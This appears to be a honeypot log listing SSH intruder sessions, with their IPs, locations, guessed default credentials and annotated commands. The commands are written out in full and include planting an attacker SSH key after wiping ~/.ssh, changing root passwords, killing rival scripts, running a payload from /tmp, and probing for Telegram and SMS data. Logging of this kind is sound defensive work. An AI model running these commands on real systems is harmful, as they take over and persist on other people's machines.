$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:4uQoAfdTLpSn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ placid_eagle_root_113 (47.88.48.113) โ€” Minkler, United States ยท 1 session ยท 1 cmd
2026-05-18 07:47 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ murky_jade_root_254 (8.140.27.254) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-18 05:10 EDT ยท as oracle/oracle
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ clandestine_static_pi (181.205.14.114) โ€” Medellรญn, Colombia ยท 2 sessions ยท 3 cmds
2026-05-18 00:48 EDT ยท as pi/raspberry
make executable โ†’ execute payload โ†’ execute from /tmp
$ cd /tmp && chmod +x ITwZYa3K && bash -c ./ITwZYa3K
โ†ณ make executable
$ ./ITwZYa3K
โ†ณ execute payload
$ scp -t /tmp/ITwZYa3K
โ†ณ execute from /tmp
๐ŸŽญ restless_clog_root (176.65.132.17) โ€” Eygelshoven, The Netherlands ยท 24 sessions ยท 24 cmds
2026-05-17 21:15 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 24x across 24 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—24
๐ŸŽญ vapor_cosmo_root (194.32.87.93) โ€” Moscow, Russia ยท 1 session ยท 1 cmd
2026-05-17 21:45 EDT ยท as oracle/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ murky_panda_pi (120.55.4.115) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-17 21:18 EDT ยท as pi/raspberry
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ scrappy_ghost_sol (195.178.110.26) โ€” Andorra la Vella, Andorra ยท 6 sessions ยท 6 cmds
2026-05-17 19:54 EDT ยท as sol/123, sol/sol, solana/solana
Ran uname 6x across 6 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—6
โ†ณ obfuscated system check
๐ŸŽญ zealous_junk_root (20.2.235.190) โ€” Hong Kong, Hong Kong ยท 2 sessions ยท 2 cmds
2026-05-15 05:30 EDT ยท as root/123456, test/123456
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ wily_stroopwafel_sol (80.94.92.183) โ€” Amsterdam, The Netherlands ยท 235 sessions ยท 235 cmds
2026-05-06 18:29 EDT ยท as sol/123, sol/sol, solana/solana
Ran uname 847x across 847 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—235
โ†ณ obfuscated system check
๐ŸŽญ weary_mekong_root (203.171.29.193) โ€” Hanoi, Vietnam ยท 32 sessions ยท 32 cmds
2026-05-17 17:53 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 21x across 21 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ zealous_neon_root (47.76.78.115) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-17 15:37 EDT ยท as root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ drowsy_k-pop_root_4 (61.76.112.4) โ€” Changwon, South Korea ยท 1 session ยท 19 cmds
2026-05-17 11:13 EDT ยท as root/password
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:5xqzsNfYcNUN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ lurking_silk_root_2 (115.190.149.2) โ€” Haidian, China ยท 1 session ยท 1 cmd
2026-05-17 07:21 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ gnarled_dragon_root_18 (58.210.182.18) โ€” Suzhou, China ยท 1 session ยท 1 cmd
2026-05-17 06:46 EDT ยท as guest/guest
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ molten_cowboy_root_75 (74.208.24.75) โ€” Kansas City, United States ยท 1 session ยท 1 cmd
2026-05-17 04:06 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ haywire_wok_root (117.187.180.166) โ€” Jinrongjie, China ยท 1 session ยท 1 cmd
2026-05-17 04:04 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ venomous_panda_root (47.104.163.51) โ€” Qingdao, China ยท 1 session ยท 1 cmd
2026-05-16 20:20 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ baroque_neon_root_233 (165.154.22.233) โ€” Hong Kong, Hong Kong ยท 1 session ยท 2 cmds
2026-05-16 19:30 EDT ยท as oracle/oracle@2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ spectral_hawker_root (167.172.73.9) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-05-16 19:29 EDT ยท as oracle/oracle@2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_hanbok_root (222.111.225.250) โ€” Jongno-gu, South Korea ยท 2 sessions ยท 4 cmds
2026-05-07 00:29 EDT ยท as oracle/oracle@123456, oracle/oracle@2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ venomous_kopi_root (47.236.116.235) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-16 18:03 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ savage_orchid_root (129.226.156.184) โ€” Singapore, Singapore ยท 1 session ยท 19 cmds
2026-05-16 16:41 EDT ยท as root/toor
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:ol2qxi4lSAHp"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ weary_kopi_root (43.134.24.11) โ€” Singapore, Singapore ยท 32 sessions ยท 32 cmds
2026-05-16 14:32 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 32x across 32 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ midnight_kimchi_root (115.140.161.61) โ€” Changwon-si, South Korea ยท 1 session ยท 9 cmds
2026-05-16 15:20 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ spectral_wok_root (8.138.221.210) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-05-16 15:07 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ savage_kudu_root (20.164.21.26) โ€” Johannesburg, South Africa ยท 35 sessions ยท 35 cmds
2026-05-16 12:21 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 35x across 35 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—35
๐ŸŽญ frantic_bike (20.16.140.47) โ€” Amsterdam, Netherlands ยท 1 session ยท 1 cmd
2026-05-16 11:54 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ hollow_husk_root (213.160.170.164) โ€” Bratislava, Slovakia ยท 1 session ยท 9 cmds
2026-05-16 06:13 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ rabid_silk_root (117.50.89.245) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-16 02:58 EDT ยท as root/admin123
grep
$ grep processor /proc/cpuinfo|grep -v Duo|wc -l
๐ŸŽญ frantic_bosphorus_root (31.40.204.166) โ€” Istanbul, Tรผrkiye ยท 36 sessions ยท 36 cmds
2026-05-15 22:52 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 36x across 36 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—36
๐ŸŽญ wired_panda_root (120.40.212.137) โ€” Sanming, China ยท 1 session ยท 1 cmd
2026-05-15 22:10 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ wily_blitz_root (43.165.3.187) โ€” Frankfurt am Main, Germany ยท 1 session ยท 20 cmds
2026-05-15 21:21 EDT ยท as ubuntu/1q2w3e4r
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "1q2w3e4r\nYL4LFQstqiSF\nYL4LFQstqiSF"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w3e4r\nYL4LFQstqiSF\nYL4LFQstqiSF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ baroque_dutch_root (176.65.132.242) โ€” Eygelshoven, The Netherlands ยท 51 sessions ยท 51 cmds
2026-05-07 23:00 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 51x across 51 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—51
๐ŸŽญ wily_volcano_root_159 (202.152.204.159) โ€” Sangkalputung, Indonesia ยท 2 sessions ยท 2 cmds
2026-05-14 23:31 EDT ยท as admin/123456, root/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ drowsy_scone_root (139.59.183.60) โ€” Slough, United Kingdom ยท 1 session ยท 1 cmd
2026-05-15 11:11 EDT ยท as root/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ drowsy_yankee_root (47.253.11.8) โ€” Charlottesville, United States ยท 17 sessions ยท 17 cmds
2026-05-15 08:49 EDT ยท as admin/123456, admin/password, deploy/deploy123
Ran uname 17x across 17 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—17
๐ŸŽญ molten_shogun_root (43.167.9.122) โ€” Tokyo, Japan ยท 1 session ยท 1 cmd
2026-05-15 07:32 EDT ยท as user/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ molten_pretzel_root (94.26.106.229) โ€” Kriftel, Germany ยท 27 sessions ยท 27 cmds
2026-05-15 06:25 EDT ยท as admin/123456, admin/admin123, admin/password
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ obsidian_bike_sol (192.109.200.50) โ€” Eygelshoven, The Netherlands ยท 32 sessions ยท 32 cmds
2026-05-15 05:06 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ feral_samba_root (170.80.65.140) โ€” Sรฃo Josรฉ da Lapa, Brazil ยท 1 session ยท 19 cmds
2026-05-15 05:56 EDT ยท as root/123qweasdZXC
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:Oos1kVQ6ibxF"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ midnight_dragon_root_220 (106.13.163.220) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-15 02:07 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ feral_amber_root (83.168.69.16) โ€” Szczecin, Poland ยท 32 sessions ยท 32 cmds
2026-05-14 21:14 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 32x across 32 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ grumpy_junk_root (172.98.22.200) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-14 21:58 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ crimson_orchid (43.160.249.52) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-14 20:46 EDT ยท as user/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ drowsy_burger_root_231 (152.53.195.231) โ€” Manassas, United States ยท 1 session ยท 9 cmds
2026-05-14 20:10 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ stoic_silk_root_10 (203.156.216.10) โ€” Hongkou, China ยท 1 session ยท 1 cmd
2026-05-14 13:34 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ drowsy_wok_root (120.77.248.58) โ€” Shenzhen, China ยท 2 sessions ยท 2 cmds
2026-05-11 16:26 EDT ยท as oracle/Oracle@123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ cryptic_beefeater (161.35.172.206) โ€” Slough, United Kingdom ยท 1 session ยท 1 cmd
2026-05-14 06:24 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ aloof_sensei_root (8.211.145.144) โ€” Tokyo, Japan ยท 1 session ยท 1 cmd
2026-05-14 05:43 EDT ยท as pi/raspberry
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ gnarled_dragon_root_85 (121.4.80.85) โ€” Shanghai, China ยท 1 session ยท 1 cmd
2026-05-14 04:47 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ rusty_wok_db (182.92.94.19) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-14 03:09 EDT ยท as oracle/Oracle@123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ ashen_gouda_sol (2.57.122.53) โ€” Amsterdam, The Netherlands ยท 86 sessions ยท 86 cmds
2026-05-11 19:03 EDT ยท as bitcoin/bitcoin, eth/eth, firedancer/firedancer
Ran uname 86x across 86 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—86
โ†ณ obfuscated system check
๐ŸŽญ gnarled_static_root (185.158.23.150) โ€” Karbala, Iraq ยท 1 session ยท 19 cmds
2026-05-13 23:52 EDT ยท as root/pass123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
